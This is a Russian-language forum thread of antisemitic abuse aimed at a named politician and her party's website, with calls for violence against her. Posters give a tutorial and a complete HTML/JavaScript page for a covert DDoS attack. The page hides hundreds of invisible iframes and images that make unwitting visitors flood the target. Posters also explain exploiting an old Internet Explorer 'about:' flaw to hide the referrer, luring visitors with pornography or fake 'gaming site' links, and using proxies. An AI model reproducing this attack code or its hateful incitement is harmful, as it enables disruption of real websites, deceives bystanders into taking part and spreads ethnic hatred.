Форум » Битие Жыда » Ногодерская » Ответить

Ногодерская

РовоамЪ: Кто как считаетЪ - Валерия Ногодерская - русская, ябрейка, жЫдоФФка или какое еще сущЩАство? Сайт Ногодерской - http://ds.ru Я так думаю, что она не просто жЫдоФФка, а гнилая жЫдоФФская жаба. Она на своем форуме много раз называла русскихЪ рабочих и крестьян - тунеядцами и умственно отсталыми, а думающих людей - экстремЫстами и фОшЫстами, и такими же умственно отсталыми... Форум ее САЪйта закрытЪ, но в дукоментах ДС ( Дерьмократического Союза ) они присягают жЫдам, говоря о том, что сознательно обязуюЦЦа защищать жЫдополицейскую "Конституцию Российской Федерации" ... В связи с этим возможны и даже нужны прямые акты насилия.

Ответов - 11

РовоамЪ: Способ совершения прямого акта насилия против жЫдополицейских сил ( Пишет некто Vad ) Объясню популярно смысл хотлинка и способ его проведения через протокол about: Хотлинк - это загрузка како-го либо файла с сервера жертвы на атакующем сервере Для чего нужен хотлинк? Для того, что бы создать нагрузку либо на канал атакуемого сервера либо на сам сервер. Есть 2 способа хотлинка: a) Можно разместить на своих сайтах код, загружающий какую-то увесистую картинку с сайта жертвы: <img src=http://site.com/image.gif>. Что бы не показывать эту картинку вашим серферам, проставим размеры в 1 пиксель: <img src=http://site.com/image.gif width=1 height=1> Для солидности, можем запретить показ картинки на вашей странице с помощью стилей: <img src=http://site.com/image.gif width=1 height=1 style=display:none> При таком подходе каждый срефер, зашедший на ваш сайт, загрузит картинку с атакуемого сервера, но не увидит ее. Что имеем? Имеем загрузку канала атакуемого сервера. Траффик стоит денег, соответсвенно у жертвы растут счета за хостинг. Если у жертвы канал не толстый, то при большом количестве запросов произойдет пробка и к серверу пробиться станет сложно. Но это не наш метод. Переходим к способу "б" б) Запрашивать нужно не картинки а "тяжелые" скрипты. Скрипты, требующие обращения к базам данных или больших вычислительных мощностей. Обычно на сайтах типа КЦ скрипты не оптимизированны под большие нагрузки. Большое количество запросов к таким скриптам загрузит процессор атакуемого сревера, забьет логами жесткий диск и т.д. В результате сервер просто умрет, хотя канал до сервера будет загружен не очень сильно. Пример: <img src=http://site.com/script.php width=1 height=1 style=display:none> В таком варианте атакуемый сервер получает запрос на выполнение срипта и выполняет его, но так, как запрашиваем мы через тег <img src>, а возвращаемый результат не является картинкой, то на нашем сайте будет показана иконка "битой картинки". Загнав эту иконку в 1х1 пиксель и прикрыв стилями (style=display:none) мы избавим наших серферов от просмотра "битой" графики. Они просто ничего не заметят :) Для увеличения нагрузки на сервер можно хотлинковать сразу 5-10-20... скриптов. Просто увеличиваем количество "картинок": <img src=http://site.com/script1.php width=1 height=1 style=display:none> <img src=http://site.com/script2.php width=1 height=1 style=display:none> <img src=http://site.com/script3.php width=1 height=1 style=display:none> ......... Лучше всего ставить эти код вниз своих страниц, что бы серферу не пришлось ждать загрузки вашей информации. Он сперва получит то, за чем пришел и попутно дернет жертву. Подход всем хорош, за исключением того, что эти запросы могут быть обращены против атакующего. При получении запроса к картинке или скрипту, сервер может проверить поле HTTP_REFERRER и если в этом указано, что запрос пришел с атакующего сайта, средиректить его обратно, на какой-либо из ваших собственных скриптов. В итоге вы будете грузить сами себя. Что бы этого не произошло мы несколько усложним конструкцию. В IE имеется протокол "about:". Пример - ваша стартовая страница about:blank. В версиях IE до XPSP2 и некоторых патчей для SP1 работает следущая фича: При добавлении любого символа после двоеточия в about:, этот символ выводится на странице. например about:1 - выведет на странице единицу. about:<script>alert()</script> - выведет в теле страницы код скрипта и исполнит его. about:<img src=http://site.com/image.gif> - выведет на странице картинку. about:<img src=http://site.com/script1.php width=1 height=1 style=display:none> - дернет скрипт на чужом сервере, создав нагрузку. Самое главное: поле HTTP_REFERRER при этом останется пустым, т.к. выполняется это всё на локальной машине. Соответсвенно вернуть вам ответку атакуемый не сможет. Он будет видеть запросы, но источник атаки он не обнаружит. И так доводим код до ума и вызываем протокол about: в ифрейме. <iframe src="about:<img src=http://chechenpress.info/forum/index.php?showtopic=156>" width=0 height=0> Продублировав такой код 10 раз и изменив имена вызываемых скриптов вы заставите каждого посетителя вашего сайта 10 раз дернуть вражеский сервер. Хотлинковать лучше всего тяжелые скрипты, например топики на форумах http://chechenpress.info/forum/ http://kavkazchat.com Просто скопируйте URL топиков в буфер обмена и замените нужные фрагменты кода. P.s. Этот протокол пропатчен M$ примерно год назад. Эти конструкции будут работать процентах на 40-50 машин, на тех, где не стоит SP2. Остальные, пропатченные пользователи просто ничего не заметят. Vad (с)перто, нахуй, с http://groups.yahoo.com/group/peace4peace/message/11

РовоамЪ: http://killds.narod.ru ФФФсе жмите!!! Авось, повалим сЦайт НогодерскоЙ!!! Компы загружаетЪ это дело надолго... Может даже на-минуту, на две загрузить слабую машину... Но не ссыте по два-три раза подряд перезагружать!!! А потом еще и еще!!! Бей жЫдовку Ногодерскую!!!

РовоамЪ: И об использовании прокси помнимЪ!


РовоамЪ: Без прокси пусть туда заходят постороннИЯ люди... А мы, как регулярные пользователи - лучше через прокси.

РовоамЪ: Только, возможно, сайт, который будет DDoSить Ногодерскую, удалят. Тогда можно будет создать еще. Для этого нужен следующий код. <HTML> <HEAD> <TITLE>Бей жЫда!</TITLE> <SCRIPT language = "JavaScript"> var flag_2 = new String(); flag_2 = 0; var flag_3 = new String(); flag_3 = 0; var kodla = new String(); kodla = '<iframe src="about:<img src=http://ds.ru/photo/cks3.jpg>" width="2" height="2"></iframe><iframe src="about:<img src=http://ds.ru/valeria.jpg>" width="2" height="2"></iframe><iframe src="about:<img src=http://ds.ru/ds.jpg>" width="2" height="2"></iframe><iframe src="about:<img src=http://ds.ru/photo/rwsh.jpg>" width="2" height="2"></iframe><img src="http://ds.ru/photo/cks3.jpg" width = "1" height = "1"><img src="http://ds.ru/photo/valeria.jpg" width = "1" height = "1"><img src="http://ds.ru/ds.jpg" width = "1" height = "1"><img src="http://ds.ru/photo/rwsh.jpg" width = "1" height = "1"> '; var kodla_1 = new String(); function generation_str_k(){ if(flag_1 == 1&&flag_2 == 0){ i=0; while(i<500){ kodla_1 = kodla_1 + kodla; i++ ; }; setTimeout("gefight_ds()",1000); flag_2 = 1; return kodla_1,flag_2; }; }; setInterval("generation_str_k()",1000); function gefight_ds(){ if(flag_1 == 1&&flag_3 == 0){ document.all.ds_ddos.innerHTML = kodla_1; flag_3 = 1; return flag_3; }; }; var flag_1 = new Number(); flag_1 = 0; function window.onload(){ flag_1 = 1; return flag_1; }; </SCRIPT> </HEAD> <BODY> <BR><BR> <FONT size = "5"> Жыда побивая DDoSом и берцем<BR> Мы свято блюсти будем Бобы слова<BR> Наш марш отзывается в трепетной сердце<BR> Построим в России ЦН.Где Жратва<BR> <BR><BR> Бей жЫдовку Ногодерскую! </FONT> <BR><BR> <DIV id = "nol_pusto"> </DIV> <BR><BR> <DIV id = "ds_ddos" width = "500" height = "10000"> </DIV> </BODY> </HTML> Примечание: <DIV id = "nol_pusto"> </DIV> Вот этот вот контейнер предназначен для того, чтобы вставлять туда картинки на тему убиения НоводворскойЪ, порнографию, а также любые тругие картинки, которые привлекут посетителей такого сайта. Посетители будут смотреть картинки, а web-страничка тем временем будет делать полезное дело, перегружая сайт Ногодерской. --------- Для полного омертвения сайта Ногодерской ( http://ds.ru ) может портебоваться нехилая мощь. Очень много запросов. Зато и результат в таком случае будет соответствующий.

БобомолецЪ: Я такЪ думаю, што дело побиения Жыдо-Новодворской суть архибобоугодно, но дахуя букаф и ниасилил, и надо бля итти на Каловыя Шахты. Опосля осилю методику и Побью Жыда. За РиЖ!

РовоамЪ: ... Осилишь. ... Достаточно уметь сохранять страницы в виде html в блокноте. И картинки с текстом вставлять. И посмотреть, куда можно вставлять всякую всячину, которая привлечет внимание посетителей на ЕНту страницу. За Р&Ж!

РовоамЪ: ... Запросов действительно понадобиЦЦа до хренища, если у http://ds.ru хорошие админы ( за счет чУмАдана денег ) ... Пока что всего два сайтика сделано. На игровые сайты можно кидать следующую ссылку ( типа, "посетите интересный игровой сайт ) : http://dsddos.newmail.ru

РовоамЪ: Еще один сайт для совершения DDoS-атак на сайт Новодворской ( http://ds.ru ) : http://dsddos.narod.ru Этот сайт тоже можно рекламировать очень просто, типа, "посетите игровой сайт". Вчера сайт Новодворской уже ложился, сЦука, когда несколько человек одновременно заходили. ... Главное - перегружать скрипты...

РовоамЪ: Подправил малость сайты для DDoSа Новодворской. Теперь запросов больше, а сайты, которые интересуют пользователей, открываются в новом окне. ... Это удобнее, чем перенаправление.

Тгоцкийъ: ЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЫЪЪЪЪЪЪЪЪЪЪЪ!



полная версия страницы